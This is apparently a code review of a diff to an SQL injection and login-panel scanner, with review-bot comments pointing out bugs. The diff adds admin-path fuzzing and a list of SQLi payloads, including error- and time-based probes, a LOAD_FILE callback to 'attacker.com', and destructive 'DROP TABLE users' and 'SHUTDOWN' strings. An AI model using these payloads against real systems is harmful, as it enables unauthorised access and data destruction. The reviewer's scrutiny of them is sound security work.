diff --git a/logsensor.py b/logsensor.py
index cb669a9..e0775fc 100644
--- a/logsensor.py
+++ b/logsensor.py
@@ -9,6 +9,15 @@ from src import logninputs, payloads, Errors
 from tabulate import tabulate
+# Coomon paths to fuzz for
+common_paths = [
+ "admin", "login", "test", "backup", "passwords.txt", "admin.php", "admin.html",
+ "login.php", "login.html", "wp-login.php", "user", "dashboard", "cpanel", "panel",
+ "adm", "user.php", "user.html", "administrator", "db", "database", "phpmyadmin",
+ "pma", "config", "settings", "edit", "manage", "secure", "webadmin", "wp-admin",
+ "admin/login", "admin/login.php", "admin/login.html", "admin/index", "admin/index.php",
+ "admin/index.html"
+]
 start = time.time()
@@ -45,6 +54,10 @@ def ban():
 parser.add_argument("-n","--inputname", help=" Customize actual username input for SQLi scan (default 'username' )")
 parser.add_argument("-t","--threads", help=" Number of threads (default 30)" ,type=int)
 parser.add_argument("-h", "--help", action="help", help="Show this help message and exit")
+# Added options to Fuzz URLs before or after login panel detection checks
+parser.add_argument("-fb","--fuzz-before", action='store_true', help="Fuzz URLs before other checks")
+parser.add_argument("-fa","--fuzz-after", action='store_true', help="Fuzz URLs after successful login panel detection")
+
 args = parser.parse_args()
 if len(sys.argv) == 1:
 ban()
@@ -79,6 +92,10 @@ class main():
 def __init__(self,lines):
 self.lines = lines
 try:
+ # Fuzz URLs before other checks if --fuzz-before was specified
+ if args.fuzz_before:
+ self.fuzz_before()
+
 req = requests.get(lines, headers=useragent, proxies=proxies, verify=False, timeout=8,allow_redirects=True)
 response = str(req.content)
 soup = BeautifulSoup(response, "html.parser")
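Review bot: The header comment on the new list has a typo (`# Coomon paths to fuzz for`) and says nothing about how the entries are consumed. `common_paths` is read as a constant by `fuzz_urls` in the `-190` hunk, which builds `base_url + "/" + path`, so entries must be written without a leading slash; a comment such as `# Common paths probed by fuzz_urls(); no leading slash, each is appended to the target URL` records that constraint. Since nothing mutates the list, a tuple under an upper-case name (`COMMON_PATHS`) would follow the usual constant convention, with the single use site in `fuzz_urls` updated to match.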
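Review bot: Nothing stops `--fuzz-before` and `--fuzz-after` from being passed together, in which case a target with a detected login panel is probed by `fuzz_urls` twice (once in `__init__`, once on detection, per the `-79` and `-102` hunks). If running both is not intended, register the two options on `fuzz = parser.add_mutually_exclusive_group()` and call `fuzz.add_argument(...)` instead of `parser.add_argument(...)`. The comment `# Added options to Fuzz URLs ...` reads as a changelog entry rather than a description of the options; the same applies to `# Added a fucntion ...` in the `-190` hunk and to the `# Added extra payloads ...` line in src.py.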
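Review bot: `self.fuzz_before()` calls a method that does not exist — `fuzz_before` is only the argparse attribute, and the single fuzzing routine this commit adds is the module-level `fuzz_urls(base_url)` in the `-190` hunk — so `--fuzz-before` raises `AttributeError` on the first statement of the `try:` block. Whether that surfaces or is silently swallowed depends on the `except` clause, which lies outside the hunk along with the rest of `__init__`. The intended call is presumably `fuzz_urls(lines)`.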
@@ -102,6 +119,9 @@ def __init__(self,lines):
 if find != None:
 loginurls.append(req.url +str(action))
 print(colored("[+] Login panel found ! [{}] - {}","green").format(req.url, req.status_code))
+ # Fuzz URLs after successful login panel detection if --fuzz-after was specified
+ if args.fuzz_after:
+ fuzz_urls(req.url +str(action))
 break
 else:
 pass
@@ -132,6 +152,7 @@ def getresults():
 msgpyld = colored("[+]","green",attrs=["bold"])+" Payload: "
 msgerr = colored("[+]","green",attrs=["bold"])+ " Detected error: "
 msgreg = colored("[+]","green",attrs=["bold"])+" Regex Used: "
+
 def inject(loginurls, inputname):
 print(colored("[@] Start POST Form SQLi Scanning [@]","cyan"))
 try:
@@ -190,6 +211,15 @@ def inject(loginurls, inputname):
 print("\nStopped")
 exit(0)
+# Added a fucntion to Fuzz the different URLS
+def fuzz_urls(base_url):
+ for path in common_paths:
+ url = base_url + "/" + path
+ response = requests.get(url)
+ if response.status_code == 200:
+ print("Potential hidden resource found at: " + url)
+
+
 if __name__ == '__main__':
 def sensorWithThreads():
 try:
diff --git a/src.py b/src.py
index 7e3bce6..97953d9 100644
--- a/src.py
+++ b/src.py
@@ -10,7 +10,7 @@
 '[Ll]og [Ii]n']
-
+# Added extra payloads to test Boolean and Time Based blind SQLi, also added some checks for Union Based, Error based, Out of Bound, Stack queries SQLi's
 payloads = ["' or ''-'",
 "admin' or '1'='1",
 "' UNION ALL SELECT 1",
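Review bot: `fuzz_urls(req.url +str(action))` hands the form's action URL to a function that appends `"/" + path` to it (see the `-190` hunk), so when the action is a file such as `login.php` every probe goes to `login.php/<path>` rather than to the locations the `--fuzz-after` help text describes. Passing `req.url` here and resolving each entry with `urllib.parse.urljoin(base_url, path)` inside `fuzz_urls` would place the paths relative to the page the way a browser would. `__init__` continues outside the hunk.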
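Review bot: `requests.get(url)` in `fuzz_urls` carries none of the settings the scanner's other request uses (`headers=useragent, proxies=proxies, verify=False, timeout=8` in the `-79` hunk): fuzz traffic bypasses the configured proxy, presents a different User-Agent, and with no timeout can block a worker thread indefinitely on a host that accepts the connection but never answers. A connection or DNS failure raises `requests.exceptions.RequestException`, which is not caught here, so one unreachable path aborts the remaining entries and propagates into the caller. The request line should become `response = requests.get(url, headers=useragent, proxies=proxies, verify=False, timeout=8)`, inside a `try` whose `except requests.exceptions.RequestException:` does `continue`. A bare `200` check also reports every entry on sites that answer unknown URLs with a catch-all 200 page, and because redirects are followed by default a redirect onto a 200 landing page counts as a hit too; the comment `# Added a fucntion to Fuzz the different URLS` should describe the function (e.g. `# Probe base_url for each entry of common_paths and report 200 responses`) rather than the commit.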
@@ -20,7 +20,21 @@
 "admin' and substring(password/text(),1,1)='7",
 "' and substring(password/text(),1,1)='7",
 "' or 1=1 limit 1 -- -+",
- "'=or'"]
+ "'=or'",
+ "' OR 'a'='a",
+ "' OR 'a'='b",
+ "' OR 1=1 --",
+ "' OR 1=2 --",
+ "' OR SLEEP(5) AND '1'='1",
+ "' OR SLEEP(5) AND '1'='2",
+ "' UNION SELECT 1,2,3,4,5 --",
+ "' UNION SELECT NULL,NULL,NULL --",
+ "' OR SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x7e,0x27,CAST(database() AS CHAR),0x27,0x7e)) FROM `information_schema`.tables LIMIT 0,1),FLOOR(RAND(0)*2))x FROM `information_schema`.tables GROUP BY x)a --",
+ "' OR (SELECT 1 FROM (SELECT SLEEP(25))A) --",
+ "' OR (SELECT LOAD_FILE('\\\\attacker.com\\test.txt')) --",
+ "'; DROP TABLE users; --",
+ "'; SHUTDOWN; --"]
+
 # Regex from Ekultek (https://github.com/Ekultek/Zeus-Scanner/blob/master/lib/core/settings.py) with some edits
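Review bot: `"'; DROP TABLE users; --"` and `"'; SHUTDOWN; --"` are destructive statements rather than detection probes: on a form that really accepts stacked queries they delete a table or stop the database server, and `inject` (judging by the `Payload:` reporting in the `-132` hunk) appears to send every entry of `payloads` to each detected login form. A scanner whose purpose is to report an injection point should not carry them; the boolean and UNION entries added alongside already cover the detection case. The `SLEEP(5)`/`SLEEP(25)` and `LOAD_FILE('\\\\attacker.com\\test.txt')` entries also yield nothing here — the visible reporting messages (`Detected error:`, `Regex Used:`) indicate error-signature matching with no response-timing measurement or callback listener — so they only stall the scan against whatever request timeout `inject` uses (not visible in this diff) and make the target open an outbound connection to a host the operator does not control. Dropping those five entries leaves the list safer and no less effective for this scanner.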